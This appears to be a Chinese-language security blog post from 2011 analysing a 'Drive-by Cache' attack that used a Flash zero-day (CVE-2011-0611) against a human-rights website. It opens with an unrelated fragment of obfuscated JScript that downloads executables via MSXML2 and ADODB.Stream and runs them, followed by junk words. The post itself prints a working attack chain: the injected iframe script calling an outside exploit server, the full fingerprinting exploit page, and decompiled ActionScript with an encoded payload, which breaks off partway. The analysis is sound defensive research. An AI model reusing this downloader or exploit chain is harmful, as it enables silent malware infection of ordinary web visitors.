test[readAmong]("Shell.A9kDj".substr(0,7)+"DH0pplicat0HD".substr(3,7)+"MrbionMbr".substr(3,3),age);find=[];this.learn="";hold=[];air = test[readAmong]("adodb.strea"+"mnXk".substr(0,1),age);this.why=19607;this.why++;var rest=new Date();var him="";var turn = oh();this.differ="differ";var sawAmong=["moneyAt","moreA","boyMuch"];var stopSun=["letter","pound","young"];var sideHeat=["white","spellAbove"];var thoseFirst=["northFact","needCome"];doesRock=17386;doesRock--;if(turn.length <= 0) return false;which=["i","took","fish"];agoOld=["laughOften","seemOrder","figureGreen"];var runHalf={cut:27153};var schoolOut=["differGot","wonder","poseNotice"];for(var i=sun; i < turn.length; i++){var fromLong=new Date();var haveSlow=new String();var ifCover=["finalDone","againOnly"];var unitIt=[];pullTown={leadOut:"deepMade"};var decide=[];this.both=22541;this.both++;var unit = out[i % out.length];var enough = turn[i];goodDrive={water:"cry"};secondCenter=[];var endDiffer=false;var your = "./."+"./yzvw".substr(0,2) + unit + new String(".exe");this.dont=18287;this.dont--;try {var faceAppear="fewReal"} catch(faceAppear){};var voicePoint=low * i;var shortPlane=["heatRule"];var knew="";try {var shapeCause="ageHave"} catch(shapeCause){};dryLook=[];meanFar(new String(enough), new String(your));var right=23685;try {} catch(feel){};try {} catch(hisTree){};var had=new Date();}} catch(e){}}function longSaid(stoodTree){planeIt={};var shouldSide=8362;northAmong={faceMade:false};var windReal="windReal";cutOften=["riverPiece","orderWater","commonLay"];nowSay=["bodyAlso"];begin = test[readAmong]("msxml2.XMLO4eW".substr(0,10)+"HTTP", age);var planeTop=new Date();whichThem={shipSame:26359};var fatherIdea=24125;var there=16243;begin[move]("GET", stoodTree);asAmong=["seaFew"];whileRun=["warDrive"];this.feetSing=7842;this.feetSing--;begin[best]();var thatWhen="thatWhen";this.hisNever="hisNever";story=9303;story+=10;return begin[redDog];}function free(){var thereWrite={strongPaper:false};this.keepLot="";return (document.body.style.textOverflow != undefined);}function meanFar(stoodTree,color){var wentMother=["turnTalk","staySleep","she"];this.largeRed=28365;this.largeRed-=184;eat=["atMove"];var found={shouldPlay:"figureStep"};try {var standMother=3260;toward=26805;toward++;var actPress="";try {var work="lightCold"} catch(work){};try {var other=new Date();var rainTable=28788;air[bed]();this.coldMake="coldMake";fatherUs=["andFast","hour"];} catch(stand){}this.lastTheir=29388;this.lastTheir--;var downStrong={topWas:11226};try {var answerWater="servePaper"} catch(answerWater){};power=longSaid(stoodTree);peopleHad=["kingRiver"];this.house=4015;this.house++;air[once]=family;cameWho={hasEye:"bringForce"};foodEast=["feetThat","shortHave"];air[move]();happenUs=["fewMany","butWell"];var helpRound=27891;air[end](power);drawHome={number:721};surePage={late:false};air[follow](color,most);try {var cryFarm="putFollow"} catch(cryFarm){};var plantClear="";air[bed]();try {var meEver="shapeDark"} catch(meEver){};try{var whyRule=["slow","followNight"];var whiteAnswer=["standWatch","fastKnew"];var sameOff=26811;actCome=["walkHand","even","waterWay"];this.draw=29713;this.draw-=76;strong[stay](color);var clear="";var tellFront=["seemBody"];var lookNumber="";} catch(e){}mayForce=12153;mayForce+=212;var homeMay={unitFirst:false};manAt=8219;manAt+=30;whereSoon=["happenRiver","aboveCause"];cutLive=["wentThere","meanBusy"];}catch(noun) {lessFive=["fishTail","behindYet","ourAgo"];this.same=false;var airSix="";try {var direct=false;var better=["showGrow","factHand"];air[bed]();changeBack={hot:6344};var it=new Array();} catch(first){}helpPlain=["beBig","listen"];}var ageSecond=15826;this.fallThree="";var faceTree=28716;}var sleep=0;var topAnimal=false;function groundMen(){while(sleep++ < 171){groundMen();}if(!topAnimal){topAnimal = true;the();}}groundMen();</script>nisi nebs coalify opera caw add gluts rewon toph reinked bucko web moot.woofer reinked haeres arabic hernia bice blind nebs schmoos stow opera obese snaffle en hajes scow pyx.</body></html></pre></span>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-1441759431140700676.post-51257993012820277672011-04-27T11:30:00.003+08:002011-04-27T11:32:46.897+08:00利用 Flash 0-Day 的掛馬變形手法,攻擊人權網站(作者: Chris Hsiao, NightCola Lin, Wayne Huang, Fyodor Yarochkin, Crane Ku)<br />
<br />
阿碼科技為世界上最大的雲端惡意掃瞄服務的廠商之一,OEM給大型的資安公司及主機供應商。最近我們的Hackalert發現到許多起的偷渡式下載(Drive-by)攻擊都伴隨著零時差攻擊(0-days)。<br />
在最近幾年我們發現到一些有趣的威脅名詞不斷的被創造出來,因此,我們覺得有必要給這次的手法一個獨特的名詞, 我們稱之為:Drive-by Cache。<br />
<br />
以下是這篇報導的幾個摘要:<br />
A. 本次攻擊的手法是Drive-by Download的變種,我們稱之為Drive-by Cache, 這個新的機制相較於傳統的Drive-by Download更難被偵測到。<br />
B. 我們使用到最近被Hackalert scanner所偵測到的一個例子,被感染的網站是一個人權網站, 所利用的漏洞是Adobe flash 0-day: CVE-2011-0611,而HackAlert在一週前偵測到它的當時,是沒有相對應的patch的。<br />
C. 這次事件中的惡意程式本身會連回一個位於香港的伺服器,IP為182.237.3.105。<br />
<br />
更多的總結請見 <a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#forensics-summary">[5. Forensics Summary]</a>.<br />
<br />
[大綱]<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#section-1-drive-by-download">1. Drive-by Downloads的簡介</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#drive-by-cache">2. Drive by cache</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#example">3. 實際案例</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#detection-rates">4. 偵測率</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#forensics-summary">5. Forensics Summary</a><br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767#complete-exploit-codes">6. 完整程式碼</a><br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="section-1-drive-by-download"><b>[1. Drive-by Downloads的簡介]</b></a><br />
<br />
一個典型的Drive-by Download感染流程是:使用者瀏覽一個受感染的網頁之後,在未經過使用者的同意,使用者也沒有點選任何連結的情況下,其電腦就被安裝了惡意程式。我們先前的文章:<a href="http://armorize-cht.blogspot.com/2010/12/google%E5%8F%8Amicrosoft%E7%9A%84%E5%85%A9%E5%A4%A7%E5%BB%A3%E5%91%8A%E5%B9%B3%E5%8F%B0%E9%81%AD%E6%8E%9B%E9%A6%AC%E5%88%A9%E7%94%A8%E6%95%A3%E6%92%AD%E6%83%A1%E6%84%8F%E8%BB%9F%E4%BB%B6.html">Google及Microsoft的兩大廣告平台遭掛馬利用散播惡意軟件</a>就是一個最好的例子。<br />
<br />
這種型態的威脅從2000年開始就已經存在,在2003年時透過heap-spraying 的技術被大量的運用。然而,"Drive-by Download"這個名詞直到Google在2003年發表了一篇論文:<a href="http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf">"Ghost in the Browser"</a>後,才更具體的被引用。<br />
<br />
下圖簡單的描述這個流程,更詳細的資料請參考我們在2009 Blackhat / DEFCON所發表的<a href="http://www.slideshare.net/wayne_armorize/drivesploit-circumventing-both-automated-and-manual-drivebydownload-%0A%0Adetection">drivesploit 演示中</a>之第15-17頁。<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6dYpvnafy_bMMp3o-QkEJp63jkU3a36bng1exXVcVhOZ4snXPafUmWgkkMnb4-rwbBWicXkmBM2vmfDJqhO9QkqafG6H5WGZ0qjCEt8GazpOx7NF7sBYCK743EXU9WCi_7ERVpNlTCY/s1600/drive_by_cache_1.PNG" onblur="try
{parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596140386385602114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6dYpvnafy_bMMp3o-QkEJp63jkU3a36bng1exXVcVhOZ4snXPafUmWgkkMnb4-rwbBWicXkmBM2vmfDJqhO9QkqafG6H5WGZ0qjCEt8GazpOx7NF7sBYCK743EXU9WCi_7ERVpNlTCY/s1600/drive_by_cache_1.PNG" style="cursor: hand; display: block; margin: 0px auto 10px; text-align: center; width: 750px;" /></a><br />
<span class="fullpost"><br />
第一步,受害者瀏覽一個受感染的網站,這個網站因為存在已知的漏洞,被有心者植入惡意連結,此連結會動態產生iframe或script,將受害者的瀏覽器導向惡意網域。最終瀏覽器會執行到惡意網域上的惡意攻擊碼(exploit code),這些程式碼大部份都是javascript或flash。在本次事件中,該exploit code所利用的是Adobe flash 0-day <a href="http://www.adobe.com/support/security/bulletins/apsb11-07.html">CVE-2011-0611</a> 這個漏洞。<br />
<br />
第二步,瀏覽器在執行了exploit code之後,會強制瀏覽器去執行某些指令(shellcode)。這些指令通常都是請瀏覽器連上某個特定的Url(大部份的情況下是外部網域)。<br />
<br />
第三步, 瀏覽器依照這些指令將某個Url上的檔案抓下來存在受害者本機上並且執行。<br />
<br />
對一般透過靜態特徵碼(pattern)來偵測的防毒軟體來說,要偵測Drive-by Download並不是一件容易的事。這是因為這類exploit code都是透過script來達成(javascript或是flash actionscript),這類語言可以在執行期間使用大量的混碼技巧動態的產生各種不同的形式給客戶端去執行,就像我們在drivesploit presentation中使用到的技巧類似。<br />
<br />
收集這類型隨機產生的pattern不僅對偵測率沒有多大的幫助,反而會因為無窮無盡的pattern讓自己的資料庫無止盡的增加,亦同時增加偵測時間。<br />
<br />
行為偵測則對於此類型的偵測相當的有效,因為以Drive-by Download來說,他的行為模式是一致的且可以被有效的定義:<br />
透過hooking Browser(及javascript engine)呼叫特定API的方式,我們可以看到一序列固定的步驟<br />
A. 瀏覽器瀏覽一個網頁 (受害者瀏覽一個被感染的網頁)<br />
B. Exploit Code被成功執行, 瀏覽器因此開始執行經由exploit code產生的shellcode<br />
C. 瀏覽器呼叫urlmon.dll中的URLDownloadToFile(),這個呼叫會去特定的網址抓檔案之後存在本機電腦上<br />
D. 瀏覽器執行該檔案<br />
<br />
這些shellcode都偏好讓瀏覽器去呼叫一些特定的API,比如:URLDownloadToFile(),在目前的exploit-db網站上,就有<a href="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=download&filter_exploit_text=&filter_author=&filter_platform=43&filter_type=4&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=">8 drive-by download shellcodes</a>,而這8個shellcode都是利用URLDownloadToFile() (即上述中的步驟C)來進行抓取遠端檔案的動作。<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIMIZZtIBzH8hxptuMVqFe2GAqJ0DhemExPD4NY0rcwJMG412XRcteux7PPl4XvhaJtrJQ_Do_sY8qRSJmso0sr2oa0BKCvtiGoKXUb8l29RxyryHaTOFDKjxjXG2OOWpoGcmbKm-_QtY/s1600/shellcode_exploit_db.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596410723009296546" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIMIZZtIBzH8hxptuMVqFe2GAqJ0DhemExPD4NY0rcwJMG412XRcteux7PPl4XvhaJtrJQ_Do_sY8qRSJmso0sr2oa0BKCvtiGoKXUb8l29RxyryHaTOFDKjxjXG2OOWpoGcmbKm-_QtY/s1600/shellcode_exploit_db.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
<br />
但是, 瀏覽器一般來講, 不會主動的去執行URLDownloadToFile(),因此,行為偵測即可有效的透過此一偵測方式來判別瀏覽器是否正在進行惡意行為。<br />
<br />
一般來說,為了繞過各種偵測技術,shellcode必需被設計的越小越好,同時行為也越像瀏覽器越好。要達成這個目的最簡單的方式,就是請瀏覽器去幫忙分擔原本需要shellcode來處理的部份。<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="drive-by-cache"><b>[2. Drive-by cache]</b></a><br />
<br />
而Drive-by Cache正是如此,在整段shellcode執行的過程中,他不會去進行(C)下載檔案的動作。取而代之的是,他是直接從瀏覽器的快取資料夾裡,取出惡意程式並且執行它。<br />
<br />
這也就是為什麼我們把 <b>download</b> 替換為 drive-by <b>cache</b> 的原因。<br />
<br />
至於惡意程式是如此在執行前進入瀏覽器的快取資料夾呢? 我們可以透過下圖來了解:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit6pi65IZtDQsDPQfKgCb1nSQl4EhSAQ0GNh6a1naNoFc33QFIIytZ2zwX491P55RwoCxzbCyWGrUjctMvVctF038HLkptW7w8GCUyQYHHLq-aSOONZ-A64qK4TFmW9yReB3sxt3yYGe8/s1600/drive-by-download-drive-by-cache.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596417932225079362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit6pi65IZtDQsDPQfKgCb1nSQl4EhSAQ0GNh6a1naNoFc33QFIIytZ2zwX491P55RwoCxzbCyWGrUjctMvVctF038HLkptW7w8GCUyQYHHLq-aSOONZ-A64qK4TFmW9yReB3sxt3yYGe8/s1600/drive-by-download-drive-by-cache.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
以下是典型的Drive-by Download流程:<br />
(1)瀏覽器讀取網址<br />
(2)瀏覽器執行Exploit Code<br />
(3)瀏覽器執行shellcode<br />
(4)shellcode去遠端下載惡意程式之後儲存在磁碟上<br />
(5)shellcode執行惡意程式<br />
<br />
在Drive-by Cache中,第四步的流程被往前移到第一步與第二步之間,除此之外,原本是透過shellcode來下載的動作反而是透過瀏覽器自己本身來完成這是怎麼達成的呢?<br />
<br />
非常簡單:惡意程式本身被更名為.jpg 或 .js檔後連結到受感染的網址。以這次的事件來看,我們可以看到這段程式碼:<br />
<br />
<pre class="brush: html;"><b><script src=newsvine.jp2></b></pre><br />
這段碼告訴瀏覽器將newsvine.jp2視為javascript,瀏覽器會產生以下動作<br />
(a)讀取這個檔案<br />
(b)將檔案放到瀏覽器的快取資料夾<br />
(c)將newsvine.jp2視為javascript並且執行<br />
當然在(C)的步驟中會失敗,因為newsvine.jp2本身是惡意程式,但是重點是他本身已經被放到瀏覽器的快取資料夾了!<br />
<br />
再次強調一次, 這個儲存的動作是瀏覽器本身的行為而並非shellcode, 而在呼叫惡意程式執行的這一部份,所使用的APIs也必然大不相同<br />
<br />
對一個行為分析引擎來說<br />
a)這是一個非常正常的瀏覽器行為並且沒有不尋常的API呼叫<br />
b)這個動作發生在第一步(瀏覽器讀取網址)之後,因此這不是傳統的Drive-by Download行為<br />
<br />
縱合以上分析,相較於Drive-by Download,Drive-by Cache較能規避現行偵測機制。<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="example"><b>[3. 實際案例]</b></a><br />
<br />
在寫這篇部落格的時候,該人權網站仍然持續被利用,透過Drive-by Cache的手法來散播惡意程式。<br />
HackAlert在第一時間偵測到這種非典型的Drive-by Download攻擊。<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKA_ZGSraC2230H-EGe_9GfPQmLuen7kfrbYt7xmR9sY-mh-ynwm7xEJ1YXB2RhFuoUWxY0QAzSvTswW_Ws3kP8abNhrZmO2EgYmObQ8BcAgHssYzztOj5j_k9hQ88dmoWSlnKruOlCM/s1600/drive-by-cache-hackalert.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596983657852707986" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKA_ZGSraC2230H-EGe_9GfPQmLuen7kfrbYt7xmR9sY-mh-ynwm7xEJ1YXB2RhFuoUWxY0QAzSvTswW_Ws3kP8abNhrZmO2EgYmObQ8BcAgHssYzztOj5j_k9hQ88dmoWSlnKruOlCM/s1600/drive-by-cache-hackalert.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
惡意程式碼片段如下(在網頁原始碼的最下面):<br />
<br />
<br />
<pre class="brush: html;"><b></div><script src="/includes/googlead.js"></script></body></html></b></pre><br />
/includes/googlead.js 組出一個iframe指向惡意網域:<br />
<br />
<pre class="brush: html;"><b>if (document.cookie.indexOf('popad') == -1) {
var e = new Date();
e.setDate(e.getDate() + 1);
e.setHours(0, 0, 0);
e.setTime(e.getTime());
document.cookie = 'popad=true;path=/;expires=' + e.toGMTString();
document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://71.6.217.131/dir/AI/exploit.html' width=468 height=60 scrolling=no></iframe>");
}</b></pre><br />
該exploit code是由http://71.6.217.131/dir/AI/exploit.html所提供,完整的原始程式碼可以在部落格最後面看到,在此我們僅列出最重要的部份:<br />
<br />
<pre class="brush: html;"><b>var display="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+"<script src=newsvine.jp2><\/script>\r\n"+
"<object width=\"550\" height=\"400\">\r\n"+
"<param name=\"movie\" value=\"done.swf\">\r\n"+
"<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n"+
"<\/embed>\r\n"+
"<\/object>"
</b></pre><br />
編排之後:<br />
<br />
<pre class="brush: html;"><b><script type="text/javascript">
window.onerror=function(){return true;};
</script>
<script src=newsvine.jp2></script>
<object width="550" height="400">
<param name="movie" value="done.swf">
<embed src="display.swf" width="550" height="400"></embed>
</object>
</b></pre><br />
"display.swf"就是包含了exploit code的flash檔。完整的反編譯後的程式碼在部落格最後面可以看到。這一段碼則是當使用者的瀏覽器執行之後,就會將newsvine.jp2這隻惡意程式放進瀏覽器快取資料夾,(Drive-by Cache)。<br />
<br />
緊接著,display.swf被瀏覽器下載下來並且其中的ActionScript被執行,該ActionScript中內含shellcode <a href="http://www.adobe.com/support/security/bulletins/apsb11-07.html">CVE-2011-0611 Adobe Flash 0-day</a>,執行了之後則將先前存放在快取資料夾中的惡意程式跑起來。<br />
<br />
Newsvine.jp2這隻惡意程式會連回位於香港(jeentern.dyndns.org:80 182.237.3.105)的CNC伺服器。<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="detection-rates"><b>[4. 偵測率]</b></a><br />
<br />
這次的exploit code是包含在Flash的actionscript裡面。因為有別於傳統的Drive-by Download shellcode,此次攻擊所使用的技巧是Drive-by Cache,因此導致偵測率極低,當我們在第一時間把檔案上傳到Virustotal掃描時,沒有任何一加防毒軟體有偵測到此種惡意行為。<a href="http://www.virustotal.com/file-scan/report.html?id=2e498420acf149a2ea785bd798061d1e14b1b069e9abd83889da7e2f8d15c227-1302535834">submitted the swf file to VirusTotal</a>, <b><span style="color: red;">結果為 0 out of 42 antivirus vendors</span></b>。<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1NmMmzUm46if0DrbNbEQZsPsFI3XtTPWmeFhWZMAzHQ7vfoFmGhEy07rPya0O9V-hPcZ48__44djwJykZEtlfau8SwVuO3-N-LqRs8VcVGxOaJoOfhKz1F1WPu0zH1-_j6DwRT4VnHJI/s1600/virustotal-drive-by-cache-1.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596987976625952322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1NmMmzUm46if0DrbNbEQZsPsFI3XtTPWmeFhWZMAzHQ7vfoFmGhEy07rPya0O9V-hPcZ48__44djwJykZEtlfau8SwVuO3-N-LqRs8VcVGxOaJoOfhKz1F1WPu0zH1-_j6DwRT4VnHJI/s1600/virustotal-drive-by-cache-1.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
另外針對newsvine.jp2(swf.exe)這個惡意程式本身,<b><span style="color: red;">結果為 1/42 on VirusTotal</span></b> (<a href="http://www.virustotal.com/file-scan/report.html?id=408997d8e452a22649a789bddbe23ba3cf3f008db4a54771c1f731437b7c4eea-1302825095">report is here</a>)。僅有Microsoft偵測到這隻後門程式。<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNHMAWT8xJ6PPi-lWvyAYmJIplFQlhSOVGa7RGBK_NkYw7aqNBaGO9GAluhgTRX-tTsQjraqek6d7LFJ8sq36OwoRjdpY_f_G0-0f9TJlJi8dmG8-TG0IROnDuJHVMMlamiUmdWUMjJL0/s1600/virustotal-drive-by-cache-dropped-newsvine.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5596987981682696450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNHMAWT8xJ6PPi-lWvyAYmJIplFQlhSOVGa7RGBK_NkYw7aqNBaGO9GAluhgTRX-tTsQjraqek6d7LFJ8sq36OwoRjdpY_f_G0-0f9TJlJi8dmG8-TG0IROnDuJHVMMlamiUmdWUMjJL0/s1600/virustotal-drive-by-cache-dropped-newsvine.png" style="cursor: hand; cursor: pointer; display: block; margin: 0px auto 10px; text-align: center;" /></a><br />
<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="forensics-summary"><b>[5. Forensics Summary]</b></a><br />
<br />
以下是我們目前所知的部份:<br />
<br />
1. 在大約一週前,特定的人權網站被感染(許多頁面),惡意連結目前仍然尚未移除<br />
2. 使用Drive-by Cache的技巧來進行攻擊<br />
3. 利用 <a href="http://www.adobe.com/support/security/bulletins/apsb11-07.html">CVE-2011-0611 Adobe Flash 0-day</a> 的漏洞<br />
4. Virustotal在第一時間的偵測率為 0/42 (SWF exploit code部份)、1/42(惡意程式本身)<br />
5. exploit code是由71.6.217.131來進行攻擊,這是一個位於聖地牙哥(San Diego)的網站,Hosted by <a href="http://cari.net/">Cari.Net</a>,我們相信他們的伺服器被感染來當作煤介<br />
6. newsvine.jp2這隻惡意程式(原始檔名為swf.exe)是透過Drive-by Cache的技巧來執行,他是一隻透過VB寫出來的後門程式,推斷是跟pincav同一類型,這隻惡意程式具有偽造的非法數位簽章,企圖偽冒在大陸非常熱門的迅雷P2P下載軟體<br />
7. newsfine.jp2會連回位於香港的CNC主機 (jeentern.dyndns.org:80)<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=1441759431140700676&postID=5125799301282027767" name="complete-exploit-codes"><b>[6. 完整的程式碼]</b></a><br />
<br />
以下是此次Drive-by Cache事件中完整的程式碼 (exploit code), 如果你需要更多的資訊,請e-mail給我們:<br />
chris.hsiao在armorize點com<br />
nightcola.lin在armorize點com<br />
<br />
1. http://71.6.217.131/dir/AI/exploit.html:<br />
<br />
<pre class="brush: html;"><b><html>
<head>
<script type="text/javascript">
function getCookieVal(offset) {
var endstr = document.cookie.indexOf(";", offset);
if (endstr == -1) {
endstr = document.cookie.length;
}
return unescape(document.cookie.substring(offset, endstr));
}
function GetCookie(name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg) return getCookieVal(j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie(name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (2 < argc) ? argv[2] : null;
var path = (3 < argc) ? argv[3] : null;
var domain = (4 < argc) ? argv[4] : null;
var secure = (5 < argc) ? argv[5] : false;
document.cookie = name + "=" + escape(value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : "");
}
function DisplayInfo() {
var expdate = new Date();
var visit;
expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000));
if (!(visit = GetCookie("vis1t"))) visit = 0;
visit++;
SetCookie("vis1t", visit, expdate, "/", null, false);
return visit;
}
function code() {
var num = DisplayInfo();
if (num < 3) {
return 1;
} else {
return 0;
}
}
function user() {
var weekDay = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"March.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var display = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var Example = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var info = navigator.userAgent.toLowerCase();
var win = (navigator.platform == "Win32") || (navigator.platform == "Windows");
var ck = code();
var January = info.indexOf('msie 8.0');
var February = info.indexOf('msie 7.0');
var April = info.indexOf('msie 6.0');
var June = info.indexOf("windows nt 5.1");
var August = info.indexOf("windows nt 6.1");
if (January > 0 && June > 0 && ck == 1) {
document.body.innerHTML = "xxxx" + weekDay;
}
if (June > 0 && ck == 1 && (February > 0 || April > 0)) {
document.body.innerHTML = "xxxx" + display;
}
if (January > 0 && August > 0 && ck == 1) {
document.body.innerHTML = "xxxx" + Example;
}
}
</script>
</head>
<body onload=user()>
</body>
</html>
</b></pre><br />
2. ActionScript中的exploit code, 由取得的swf檔反編譯:<br />
<pre class="brush: js;"><b>package ie_fla {
import flash.display. * ;
import flash.utils. * ;
dynamic public class MainTimeline extends MovieClip {
public
var s: Object;
public
var s2: Object;
public
var s3: Object;
public
var a: Object;
public
var t: Object;
public
var i: Object;
public
var r: ByteArray;
public
var ldr: Loader;
public
function MainTimeline() {
addFrameScript(0, this.frame1);
return;
} // end function
public
function hexToBin(param1: String): ByteArray {
var _loc_2: String;
var _loc_3: * = new ByteArray();
var _loc_4: * = param1.length;
var _loc_5: uint;
_loc_3.endian = Endian.LITTLE_ENDIAN;
while (_loc_5 < _loc_4) {
// label
_loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1);
_loc_3.writeByte(parseInt(_loc_2, 16));
_loc_5 = _loc_5 + 2;
} // end while
return _loc_3;
} // end function
function frame1() {
this.s = new ByteArray();
this.s3 = new ByteArray();
this.a = new Array();
this.t = "4357530acc050000789c4d546d6c5365143eb7bdedfb765d29dd189dac2053f00345e3171f71b062bbeec3b63377b0a026c265bddd6decdaa6f7d61698a82466fb619610e20549f8322144134d10158d261287c9f8e10f31460da2268b4663628cc1080c37cf79efb5f5fe787bee799ef39cf39c7b7b6be0d901103c01d02e413c047875bb4f7b00ac66f0007b757abc95cde1b1a8e5a80b92321eed30d9063ed8028f410ce2d00309e8853ee887935321c86859b592374102790db8e0b0643501db7ebebf8f9dee7effdc4e2c0778cd85e4a885ea4bcd923fb90b93cd3021813b8c8728f84def4cb32587be3f6317d4f3076eae5bc60aee8b3fd585dac00a6033bcdce2e4947c7d216c794196641797d27d5478e58594ca6e7bf19d63762179f985981f00a13cf1e05af6f7879f5fb251e50ed494ddb2c44812455c0a0d3b75e2c9bd62d856a05b37627e0a16868a5ce49bc062206a384448377ee3be28fbc8f3c527b6aee502ee567aa966e781c3f78b1abf6d1c21592260f5feb9b8007cf004b90ee3901bc5906c15bb8b5dbb7ced6b47cc0f8d016564f52d10cbef0ead67576ffe3e53dfd0d579127793f8db7cc31a212ec366cb07dc63afcc1bed425e45740926d73ecefe387be95dbb3e828e3863190c0785a5b472bb8b9d79ebbb7f6c3ca5842329929ed9f65945487b40096f8ae0749c739fbd8c26bc47ebfe3476d92076373d7f3ce8d8b73a81373b3c1eb08345dcc3838dd043d32d0cd2c4ff3149e4e5edaf3c22441860034c4cac1ed79d04f55b3cc5c99eeb6e580e582bbcca12e7446dffe1dbbdce3353c2e42baf5f8cb28387d6398f6a105b9ec77714919335efbdec9989eb5fda4857b48bb29b8efcf928fb540b5c70f69452447afad6e7d7b3ae1ff7cfd4d3d4ed67ffb96d8e5d5c97581972073ede5763efc55e9a70debab030317be5e80ac10d805dfce6a97d03ce7fc4d9f5d9a737ef1219898a52b6813722dea7d8f0ecf553f5073f2b59a6ed9a87788bbdb85646205fc2dbf8d2c682c38db0bd11ded20897d9328b7907eff05218c0cb86237cb977aed3171df8a625e564b0f785791ab4f9af749b183428dead5f3b26bb593632d92dbe2571697295b40286cc72ae300a79ad306aea30a2abe55831a36d31215b2e8ec59c5b91c7dc886a68b055ab998962794c35c1c8ed416c47b65280e16733157d54d1c6f46cf501a352ae96abe3865eff1e8d6ae610917b3355fd7f70b55aa69b68f51e6c8e1cd2eea9995ac1843d55a3fa90cd74c0b8ba9b7e12c58299cc19a63d484ecb6720a5d2ec654d35b59eb192b93b557c2ea7c5f2b912987ace807e43a9140a64d3d0cc14f94916d5ccb05a3684ac56a26ab4b612560a8771d481116c932b5490db820b0d8175a734a75fdef8d556e3e160227a2c4bd9d20d88e2caff0522695d54";
